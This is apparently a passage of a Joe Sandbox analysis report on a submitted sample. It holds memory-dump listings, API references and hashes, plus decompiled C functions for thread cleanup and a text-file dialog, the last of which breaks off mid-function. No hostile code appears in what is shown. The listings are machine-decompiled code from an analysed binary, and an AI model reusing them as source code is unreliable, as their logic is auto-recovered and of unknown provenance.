                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                                                                                                                                                                                                                                                                                        • String ID: l
                                                                                                                                                                                                                                                                                                        • API String ID: 2075313795-2517025534
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e8c05b3caea3bf66dc60917ec76161f1da9a774c5b16c6f9788cc368daaae04
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E63108B45043049FEB10BF69C58835ABBE4EF40314F15896DDC988B38AE779D498CF96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3227561178-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4bf978c0dfbcc7ac22944fa4be84535112569abd23369c40f2ce7a8460ac5efa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0781F5B06047058FD720DF69D68879ABBF0BB04310F104A2EE996C7790D378E895CF96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32 ref: 00410CEE
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410CF7
                                                                                                                                                                                                                                                                                                        • _setjmp3.MSVCRT ref: 00410D1F
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00410D97
                                                                                                                                                                                                                                                                                                        • _endthreadex.MSVCRT(00000000,00000000), ref: 00410E04
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
                                                                                                                                                                                                                                                                                                        • String ID: X%$h%
                                                                                                                                                                                                                                                                                                        • API String ID: 2387900098-2111123251
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
                                                                                                                                                                                                                                                                                                        • Instruction ID: 069eecf464360b48a19cab1872b724955f5dbd0cfa50671f5b9cb90f7b6cbb53
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6181FBB0604305DFD710EF66D58469ABBF0BF44344F45882EE9858B352D7B8E9C2CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 23%
                                                                                                                                                                                                                                                                                                        			E00416640(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char* _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				char* _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				int _v56;
                                                                                                                                                                                                                                                                                                        				char* _t35;
                                                                                                                                                                                                                                                                                                        				char* _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                                                                                                        				int _t43;
                                                                                                                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t75;
                                                                                                                                                                                                                                                                                                        				char* _t77;
                                                                                                                                                                                                                                                                                                        				int _t79;
                                                                                                                                                                                                                                                                                                        				int _t80;
                                                                                                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                                                                                                        				char** _t83;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t88;
                                                                                                                                                                                                                                                                                                        				char** _t89;
                                                                                                                                                                                                                                                                                                        				char** _t90;
                                                                                                                                                                                                                                                                                                        				char** _t91;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t92;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t79 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t83 = _t82 - 0x2c;
                                                                                                                                                                                                                                                                                                        				_t75 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_t75 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t79;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t61 =  *_t75;
                                                                                                                                                                                                                                                                                                        					if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t61 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        							_t35 =  *0x422464; // 0x0
                                                                                                                                                                                                                                                                                                        							__eflags = _t35;
                                                                                                                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        								_v52 = E00415C90;
                                                                                                                                                                                                                                                                                                        								_v56 = 0x10;
                                                                                                                                                                                                                                                                                                        								 *_t83 = "cond_locked_shmem_cond";
                                                                                                                                                                                                                                                                                                        								_t35 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        								 *0x422464 = _t35;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t83 = _t35;
                                                                                                                                                                                                                                                                                                        							_t80 = 0x10;
                                                                                                                                                                                                                                                                                                        							E00414700();
                                                                                                                                                                                                                                                                                                        							__eflags =  *_t75 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        							if( *_t75 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        								 *_t75 = 0;
                                                                                                                                                                                                                                                                                                        								_t80 = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t37 =  *0x422464; // 0x0
                                                                                                                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        								_v52 = E00415C90;
                                                                                                                                                                                                                                                                                                        								_v56 = 0x10;
                                                                                                                                                                                                                                                                                                        								 *_t83 = "cond_locked_shmem_cond";
                                                                                                                                                                                                                                                                                                        								_t37 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        								 *0x422464 = _t37;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t83 = _t37;
                                                                                                                                                                                                                                                                                                        							E00414660();
                                                                                                                                                                                                                                                                                                        							return _t80;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t40 = _t61 + 0x60;
                                                                                                                                                                                                                                                                                                        							_v36 = _t40;
                                                                                                                                                                                                                                                                                                        							_t41 = _t61 + 0x48;
                                                                                                                                                                                                                                                                                                        							_v32 = _t41;
                                                                                                                                                                                                                                                                                                        							_v56 = _t40;
                                                                                                                                                                                                                                                                                                        							 *_t83 = _t41;
                                                                                                                                                                                                                                                                                                        							_t43 = E00416590( *((intOrPtr*)(_t61 + 0x68)), 0xffffffff, 0);
                                                                                                                                                                                                                                                                                                        							_t79 = _t43;
                                                                                                                                                                                                                                                                                                        							if(_t43 == 0) {
                                                                                                                                                                                                                                                                                                        								_t44 = _t61 + 0x14;
                                                                                                                                                                                                                                                                                                        								_v40 = _t44;
                                                                                                                                                                                                                                                                                                        								 *_t83 = _t44;
                                                                                                                                                                                                                                                                                                        								_t45 = TryEnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        								_t86 = _t83 - 4;
                                                                                                                                                                                                                                                                                                        								__eflags = _t45;
                                                                                                                                                                                                                                                                                                        								if(_t45 == 0) {
                                                                                                                                                                                                                                                                                                        									_t79 = 0x10;
                                                                                                                                                                                                                                                                                                        									 *_t86 = _v36;
                                                                                                                                                                                                                                                                                                        									E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t61 + 8)) -  *((intOrPtr*)(_t61 + 0x10));
                                                                                                                                                                                                                                                                                                        									if( *((intOrPtr*)(_t61 + 8)) >  *((intOrPtr*)(_t61 + 0x10))) {
                                                                                                                                                                                                                                                                                                        										L12:
                                                                                                                                                                                                                                                                                                        										 *_t86 = _v36;
                                                                                                                                                                                                                                                                                                        										_t50 = E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
                                                                                                                                                                                                                                                                                                        										__eflags = _t50;
                                                                                                                                                                                                                                                                                                        										_t79 =  ==  ? 0x10 : _t50;
                                                                                                                                                                                                                                                                                                        										 *_t86 = _v40;
                                                                                                                                                                                                                                                                                                        										LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t79 =  *(_t61 + 4);
                                                                                                                                                                                                                                                                                                        										__eflags = _t79;
                                                                                                                                                                                                                                                                                                        										if(_t79 == 0) {
                                                                                                                                                                                                                                                                                                        											 *_t75 = 0;
                                                                                                                                                                                                                                                                                                        											 *_t86 = _v36;
                                                                                                                                                                                                                                                                                                        											E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
                                                                                                                                                                                                                                                                                                        											 *_t86 =  *((intOrPtr*)(_t61 + 0x64));
                                                                                                                                                                                                                                                                                                        											CloseHandle(??);
                                                                                                                                                                                                                                                                                                        											_t88 = _t86 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t88 =  *((intOrPtr*)(_t61 + 0x68));
                                                                                                                                                                                                                                                                                                        											CloseHandle(??);
                                                                                                                                                                                                                                                                                                        											_t77 = _v40;
                                                                                                                                                                                                                                                                                                        											_t89 = _t88 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t89 = _t77;
                                                                                                                                                                                                                                                                                                        											LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											_t90 = _t89 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t90 = _t77;
                                                                                                                                                                                                                                                                                                        											DeleteCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											_t91 = _t90 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t91 = _v32;
                                                                                                                                                                                                                                                                                                        											DeleteCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											_t92 = _t91 - 4;
                                                                                                                                                                                                                                                                                                        											 *_t92 = _t61 + 0x2c;
                                                                                                                                                                                                                                                                                                        											DeleteCriticalSection(??);
                                                                                                                                                                                                                                                                                                        											 *_t61 = 0xc0deadbf;
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_t92 - 4)) = _t61;
                                                                                                                                                                                                                                                                                                        											free(??);
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}






























                                                                                                                                                                                                                                                                                                        0x00416645
                                                                                                                                                                                                                                                                                                        0x0041664b
                                                                                                                                                                                                                                                                                                        0x0041664e
                                                                                                                                                                                                                                                                                                        0x00416653
                                                                                                                                                                                                                                                                                                        0x0041668c
                                                                                                                                                                                                                                                                                                        0x00416695
                                                                                                                                                                                                                                                                                                        0x00416655
                                                                                                                                                                                                                                                                                                        0x00416655
                                                                                                                                                                                                                                                                                                        0x00416659
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041665b
                                                                                                                                                                                                                                                                                                        0x0041665e
                                                                                                                                                                                                                                                                                                        0x00416696
                                                                                                                                                                                                                                                                                                        0x0041669b
                                                                                                                                                                                                                                                                                                        0x0041669d
                                                                                                                                                                                                                                                                                                        0x00416806
                                                                                                                                                                                                                                                                                                        0x0041680e
                                                                                                                                                                                                                                                                                                        0x00416816
                                                                                                                                                                                                                                                                                                        0x0041681d
                                                                                                                                                                                                                                                                                                        0x00416822
                                                                                                                                                                                                                                                                                                        0x00416822
                                                                                                                                                                                                                                                                                                        0x004166a3
                                                                                                                                                                                                                                                                                                        0x004166a6
                                                                                                                                                                                                                                                                                                        0x004166ab
                                                                                                                                                                                                                                                                                                        0x004166b0
                                                                                                                                                                                                                                                                                                        0x004166b3
                                                                                                                                                                                                                                                                                                        0x004167d0
                                                                                                                                                                                                                                                                                                        0x004167d6
                                                                                                                                                                                                                                                                                                        0x004167d6
                                                                                                                                                                                                                                                                                                        0x004166b9
                                                                                                                                                                                                                                                                                                        0x004166be
                                                                                                                                                                                                                                                                                                        0x004166c0
                                                                                                                                                                                                                                                                                                        0x004167e0
                                                                                                                                                                                                                                                                                                        0x004167e8
                                                                                                                                                                                                                                                                                                        0x004167f0
                                                                                                                                                                                                                                                                                                        0x004167f7
                                                                                                                                                                                                                                                                                                        0x004167fc
                                                                                                                                                                                                                                                                                                        0x004167fc
                                                                                                                                                                                                                                                                                                        0x004166c6
                                                                                                                                                                                                                                                                                                        0x004166c9
                                                                                                                                                                                                                                                                                                        0x004166d7
                                                                                                                                                                                                                                                                                                        0x00416660
                                                                                                                                                                                                                                                                                                        0x00416660
                                                                                                                                                                                                                                                                                                        0x00416665
                                                                                                                                                                                                                                                                                                        0x00416668
                                                                                                                                                                                                                                                                                                        0x0041666d
                                                                                                                                                                                                                                                                                                        0x00416673
                                                                                                                                                                                                                                                                                                        0x00416679
                                                                                                                                                                                                                                                                                                        0x00416681
                                                                                                                                                                                                                                                                                                        0x00416688
                                                                                                                                                                                                                                                                                                        0x0041668a
                                                                                                                                                                                                                                                                                                        0x004166d8
                                                                                                                                                                                                                                                                                                        0x004166db
                                                                                                                                                                                                                                                                                                        0x004166de
                                                                                                                                                                                                                                                                                                        0x004166e1
                                                                                                                                                                                                                                                                                                        0x004166e7
                                                                                                                                                                                                                                                                                                        0x004166ea
                                                                                                                                                                                                                                                                                                        0x004166ec
                                                                                                                                                                                                                                                                                                        0x00416736
                                                                                                                                                                                                                                                                                                        0x00416740
                                                                                                                                                                                                                                                                                                        0x00416748
                                                                                                                                                                                                                                                                                                        0x004166ee
                                                                                                                                                                                                                                                                                                        0x004166f1
                                                                                                                                                                                                                                                                                                        0x004166f4
                                                                                                                                                                                                                                                                                                        0x004166fd
                                                                                                                                                                                                                                                                                                        0x00416708
                                                                                                                                                                                                                                                                                                        0x0041670e
                                                                                                                                                                                                                                                                                                        0x00416713
                                                                                                                                                                                                                                                                                                        0x0041671c
                                                                                                                                                                                                                                                                                                        0x00416722
                                                                                                                                                                                                                                                                                                        0x00416725
                                                                                                                                                                                                                                                                                                        0x004166f6
                                                                                                                                                                                                                                                                                                        0x004166f6
                                                                                                                                                                                                                                                                                                        0x004166f9
                                                                                                                                                                                                                                                                                                        0x004166fb
                                                                                                                                                                                                                                                                                                        0x0041675a
                                                                                                                                                                                                                                                                                                        0x00416763
                                                                                                                                                                                                                                                                                                        0x00416769
                                                                                                                                                                                                                                                                                                        0x00416777
                                                                                                                                                                                                                                                                                                        0x0041677a
                                                                                                                                                                                                                                                                                                        0x0041677f
                                                                                                                                                                                                                                                                                                        0x00416782
                                                                                                                                                                                                                                                                                                        0x00416785
                                                                                                                                                                                                                                                                                                        0x00416787
                                                                                                                                                                                                                                                                                                        0x0041678a
                                                                                                                                                                                                                                                                                                        0x0041678d
                                                                                                                                                                                                                                                                                                        0x00416790
                                                                                                                                                                                                                                                                                                        0x00416796
                                                                                                                                                                                                                                                                                                        0x00416799
                                                                                                                                                                                                                                                                                                        0x004167a2
                                                                                                                                                                                                                                                                                                        0x004167a7
                                                                                                                                                                                                                                                                                                        0x004167aa
                                                                                                                                                                                                                                                                                                        0x004167ad
                                                                                                                                                                                                                                                                                                        0x004167b2
                                                                                                                                                                                                                                                                                                        0x004167b5
                                                                                                                                                                                                                                                                                                        0x004167b8
                                                                                                                                                                                                                                                                                                        0x004167ba
                                                                                                                                                                                                                                                                                                        0x004167c3
                                                                                                                                                                                                                                                                                                        0x004167c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004166fb
                                                                                                                                                                                                                                                                                                        0x004166f4
                                                                                                                                                                                                                                                                                                        0x004166ec
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041668a
                                                                                                                                                                                                                                                                                                        0x0041665e
                                                                                                                                                                                                                                                                                                        0x00416659

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TryEnterCriticalSection.KERNEL32 ref: 004166E1
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416725
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041677A
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00416785
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00416790
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 004167A2
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 004167AD
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 004167B8
                                                                                                                                                                                                                                                                                                        • free.MSVCRT ref: 004167C6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416590: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416590: InterlockedDecrement.KERNEL32 ref: 004165B9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416590: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$DeleteLeave$CloseEnterHandle$DecrementInterlockedfree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2614691852-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1c191d0dd0adc589239668a28d7ae89f025c8aa7f2191fcd58db01b9eefcd2da
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42514AB1A043048FCB10EF69D5842AEBBF4EF84310F52493AD85997355E778E885CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                                                                                                                                                                        			E00401879(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				char _v288;
                                                                                                                                                                                                                                                                                                        				char* _v316;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v324;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v344;
                                                                                                                                                                                                                                                                                                        				char* _v348;
                                                                                                                                                                                                                                                                                                        				char* _v364;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v372;
                                                                                                                                                                                                                                                                                                        				void _v376;
                                                                                                                                                                                                                                                                                                        				char _v400;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v404;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				int _v428;
                                                                                                                                                                                                                                                                                                        				char _v432;
                                                                                                                                                                                                                                                                                                        				int _v436;
                                                                                                                                                                                                                                                                                                        				void* _v452;
                                                                                                                                                                                                                                                                                                        				void* _v456;
                                                                                                                                                                                                                                                                                                        				char _v460;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v464;
                                                                                                                                                                                                                                                                                                        				char* _v468;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                                                                                                                                        				int _t66;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t72;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t84;
                                                                                                                                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _t99;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t93 = _t92 - 0x1bc;
                                                                                                                                                                                                                                                                                                        				_v408 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v404 = 0x419100;
                                                                                                                                                                                                                                                                                                        				_t55 =  &_v400;
                                                                                                                                                                                                                                                                                                        				_t90 =  &_v28;
                                                                                                                                                                                                                                                                                                        				 *_t55 =  &_v28;
                                                                                                                                                                                                                                                                                                        				_t91 = E00401A65;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t55 + 4)) = E00401A65;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t55 + 8)) = _t93;
                                                                                                                                                                                                                                                                                                        				E0040E1A0( &_v28, E00401A65,  &_v432);
                                                                                                                                                                                                                                                                                                        				memset( &_v376, 0, 0x58);
                                                                                                                                                                                                                                                                                                        				_v288 = 0;
                                                                                                                                                                                                                                                                                                        				_v376 = 0x58;
                                                                                                                                                                                                                                                                                                        				_v372 = _a4;
                                                                                                                                                                                                                                                                                                        				_v364 = "Text Files (*.txt)";
                                                                                                                                                                                                                                                                                                        				_v348 =  &_v288;
                                                                                                                                                                                                                                                                                                        				_v344 = 0x104;
                                                                                                                                                                                                                                                                                                        				_v316 = "txt";
                                                                                                                                                                                                                                                                                                        				if(_a8 == 0) {
